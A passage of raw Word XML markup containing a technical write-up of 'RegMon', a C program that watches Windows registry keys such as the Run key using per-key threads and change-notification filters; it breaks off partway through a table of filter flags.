          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00F77C71" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>For example, a registry key read from the configuration file may be: &lt;Key&gt;HKLM\\Software\\Microsoft\\Windows\\CurrentControlSet\\Run&lt;/Key&gt;. RegMon reads between two tags (&lt;Key&gt; and &lt;/Key&gt;), then the is for being monitored is HKLM\\Software\\Microsoft\\Windows\\CurrentControlSet\\Run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6E8A" w:rsidRDefault="00F77C71" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Now, RegMon separates the key into 2 main part, one is a main key (Root key) which is the four letter</w:t>
      </w:r>
      <w:r w:rsidR="00211D26">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the beginning of the key, and the second part is the subkey which is the rest of the key.</w:t>
      </w:r>
      <w:r w:rsidR="00B0640C">
        <w:t xml:space="preserve"> From the above example, the main key (or root key) is “HKLM” and the subkey is the rest of the key, which is “Software\\Microsoft\\Windows \\CurrentControlSet\\Run”</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Allocating memory for storing the main key</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pRegKey[iThread]-&gt;stlpMainKey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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>5,1);</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//Registry main key (Root key)</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lpMainKey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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>5,1);</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lpTmp = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>strstr( lpKey</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"\\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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strncpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpMainKey, lpKey, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)(lpTmp - lpKey));</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//Registry Subkey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F77C71" w:rsidRDefault="00F77C71" w:rsidP="00F77C71">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">lpKey = lpTmp + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>RegMon creates a separated thread for each key being monitored. Each thread calls the function “RegMonitor” and passes to that function the main key and the subkey stored in a struct called REGKEY</w:t>
      </w:r>
      <w:r w:rsidR="009A2690">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//Registry Monitor Threads</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strcpy(pRegKey[iThread]-&gt;stlpMainKey, lpMainKey);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strcpy(pRegKey[iThread]-&gt;stlpKey, lpKey);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hThreadArray[iThread] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateThread(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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0,</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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPTHREAD_START_ROUTINE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) RegMonitor,</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pRegKey[iThread],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0,</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&amp;dwThreadIdArray[iThread]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(hThreadArray[iThread] == </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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//ErrorHander(TEXT("CreateThread"));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ExitProcess(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1);</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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">lpKey, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(lpKey));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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">lpMainKey, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(lpMainKey));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iThread++;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Sleep(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>10);</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
    <w:p w:rsidR="006B6E8A" w:rsidRDefault="00211D26" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>REGKEY is a struct created for storing a registry key as 2 main part.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="00211D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typedef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="00211D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stlpMainKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="00211D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stlpKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="00211D26">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>REGKEY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PREGKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A4D8F" w:rsidRDefault="009A2690" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>RegMon then calls a function named WaitForSMultipleObject to wait for all these threads executing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A2690" w:rsidRDefault="009A2690" w:rsidP="009A2690">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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WaitForMultipleObjects(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">iThread, hThreadArray, </w:t>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>INFINITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="007D4BC6" w:rsidP="009A2690">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRPr="007D4BC6" w:rsidRDefault="007D4BC6" w:rsidP="009A2690">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4BC6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>RegMonitor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A2690" w:rsidRDefault="007D4BC6" w:rsidP="009A2690">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegMonitor is the function called by the created threads from RegMon. RegMonitor receives the main key and subkey information stored in a struct object, then parse these information into 2 strings storing the main key and subkey information.</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RegMonitor(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPVOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpRegKey</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PREGKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> pRegKey;</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pRegKey = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PREGKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpRegKey</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achMainKey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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>5,1);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achSubKey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color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 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snprintf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">achMainKey, 5, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"%s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, pRegKey-&gt;stlpMainKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="007D4BC6" w:rsidP="007D4BC6">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snprintf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">achSubKey, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"%s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, pRegKey-&gt;stlpKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A2690" w:rsidRDefault="00B0640C" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>RegMonitor sets a value called “dwFilter” for storing value that based on it we use to monitor the registry</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dwFilter = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>REG_NOTIFY_CHANGE_NAME</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REG_NOTIFY_CHANGE_ATTRIBUTES</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REG_NOTIFY_CHANGE_LAST_SET</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REG_NOTIFY_CHANGE_SECURITY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0640C" w:rsidRDefault="00B0640C" w:rsidP="00B0640C">
      <w:r>
        <w:t xml:space="preserve">The values set to dwFilter indicate the specific aspects that a registry key </w:t>
      </w:r>
      <w:r w:rsidR="000D4E08">
        <w:t>must</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be monitor. These values and their meanings are described in the following table.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3033"/>
        <w:gridCol w:w="5737"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B91AB3" w:rsidTr="00B91AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRPr="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRPr="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B91AB3" w:rsidTr="00B91AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>REG_NOTIFY_CHANGE _NAME</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000001L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:t>Notify the caller if a subkey is added or deleted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B91AB3" w:rsidTr="00B91AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>REG_NOTIFY_CHANGE _ATTRIBUTES</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000002L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:t>Notify the caller of changes to the attributes of the key, such as the security descriptor information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B91AB3" w:rsidTr="00B91AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
          </w:tcPr>
